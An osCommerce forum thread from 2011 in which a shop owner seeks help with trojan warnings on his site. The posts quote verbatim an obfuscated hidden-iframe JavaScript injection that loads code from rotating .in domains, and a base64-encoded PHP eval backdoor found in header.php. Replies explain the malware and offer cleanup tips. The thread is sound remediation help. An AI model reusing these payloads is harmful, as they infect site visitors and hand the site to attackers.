Hey everyone.
i got some strange problem, some trojan virus can be detected when you first enters to the web-site.
it shows sometimes that http://4684/and some thing here is loggened, and the virus thread pop ups!
heres my web http://billing.iqxtech.com
please tell me some advice how to remove it... or how to find it
Latest News: (loading..)
0
13 replies to this topic
#2
Posted 24 February 2011, 23:18
I don't see any malicious files, or scripts or iframes in the source.
Check the contents of the .htaccess in the root folder for redirects to other sites.
Check the contents of the .htaccess in the root folder for redirects to other sites.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
#3
-
- Community Sponsor
-
- 10,464 posts
- Real Name:Chris Dunn
- Gender:Male
- Location:Tecumseh, Ontario, Canada N8N 1X8
Posted 25 February 2011, 03:00
Alex,
I agree with Jim. I did not really find any signs hacker files and received no security messages while looking around your website.
Chris
I agree with Jim. I did not really find any signs hacker files and received no security messages while looking around your website.
Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
#4
Posted 06 March 2011, 15:23
i still got the same problem!!! some times i got some strange trojan secure report!
when i just get in the index and in the source i found this
[quote]
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->[/quote]
and the trojan comes from http://8931.in/dududu.js
i have tried to find this source code in all the pages: header.php index.php and etc and i found nothing!
and btw the four nombers always change sometimes it can be like 5436.in/ and so on...
and when i got no trojan reports the source is witchout this code
[quote]</script>
<form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f">
<input type=image src=layout/images/search_btn.gif align="absmiddle" >
</form></div></div><br class="clearfloat" />
<div id="mainContent">
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->
<!-- body //-->
[/quote]
up to <div style="display: block;
the source is in header.php
heres the site http://iqxtech.com
when i just get in the index and in the source i found this
[quote]
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->[/quote]
and the trojan comes from http://8931.in/dududu.js
i have tried to find this source code in all the pages: header.php index.php and etc and i found nothing!
and btw the four nombers always change sometimes it can be like 5436.in/ and so on...
and when i got no trojan reports the source is witchout this code
[quote]</script>
<form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f">
<input type=image src=layout/images/search_btn.gif align="absmiddle" >
</form></div></div><br class="clearfloat" />
<div id="mainContent">
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->
<!-- body //-->
[/quote]
up to <div style="display: block;
the source is in header.php
heres the site http://iqxtech.com
Edited by Tsport, 06 March 2011, 15:24.
#5
Posted 06 March 2011, 15:35
Hack files currently in your images folder:
google033ca56fcb20d1b7.php
googlec6e11a4aebef71ed.php
googleeeae99914d1a2ad8.php
Hackers hide their code.
Look for code in your files that has these php keywords:
base64_decode or eval or gzinflate
google033ca56fcb20d1b7.php
googlec6e11a4aebef71ed.php
googleeeae99914d1a2ad8.php
Hackers hide their code.
Look for code in your files that has these php keywords:
base64_decode or eval or gzinflate
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
#7
Posted 06 March 2011, 15:58
I don't see anything like the code you posted in the page source when I access the site.
If you found it in the header then use a text editor and look in /includes/header.php
If you found it in the header then use a text editor and look in /includes/header.php
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
#9
Posted 06 March 2011, 20:56
Tsport, on 06 March 2011, 15:46, said:
how should i look for them in my php files? with what program?
Thank you!
Thank you!
If you use most web editing tools (like Dreamweaver) you will have a search or find function and usually options on how it does that.
So you search or find for "base64_decode" (for example) and select entire site. Then you will get a list of files with that code in them.
In the case of this example it is usually at the top of every php file in the site and it is usually easier to upload a clean copy of your files than fix every file.
Search the forums or Google for how to fix your system to prevent specific things you find.
If you have a way to get a files count on your host (maybe 400-several thousand files) you can check that and when no users are on it should only change when you add something. If it changes without you adding something than someone else added some file somewhere.
Sometimes you can find those by sorting by date/time on the host and seeing what the "new" files(s) are.
Of course do all the regular security measures detailed elsewhere on the forums, like file/dir permission, htaccess, etc.
Good luck.
#10
-
- Community Sponsor
-
- 10,464 posts
- Real Name:Chris Dunn
- Gender:Male
- Location:Tecumseh, Ontario, Canada N8N 1X8
Posted 06 March 2011, 22:17
I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine.
Chris
Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
#11
Posted 07 March 2011, 13:54
You also need to patch your website so that an attacker cannot return and repeat the same action again.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
#12
Posted 08 March 2011, 09:35
what patch? can you link to the patch please?
i have found this code:
can you decode it ?
interesting whats typed in there
i have found this code:
<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>
in Header.phpcan you decode it ?
interesting whats typed in there
#13
Posted 08 March 2011, 10:06
The eval code you posted when decoded contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards).
It looks to me like its a logging script that logs the site visitors ip and downloads some code (probably a file with a virus in it) from a url on a server at http:// ininininin.in/ as well as places a cookie in your browser while bypassing and search engines that may view that page.
As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.
It looks to me like its a logging script that logs the site visitors ip and downloads some code (probably a file with a virus in it) from a url on a server at http:// ininininin.in/ as well as places a cookie in your browser while bypassing and search engines that may view that page.
As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.
Edited by Taipo, 08 March 2011, 10:09.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
#14
Posted 17 March 2011, 23:16
I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do.
States: Trojan Horse
JS:IFrame-AU[Trj}
Please help. Any help would be SO appreciated. Thank you so much in advance.
Jeanne
States: Trojan Horse
JS:IFrame-AU[Trj}
Please help. Any help would be SO appreciated. Thank you so much in advance.
Jeanne
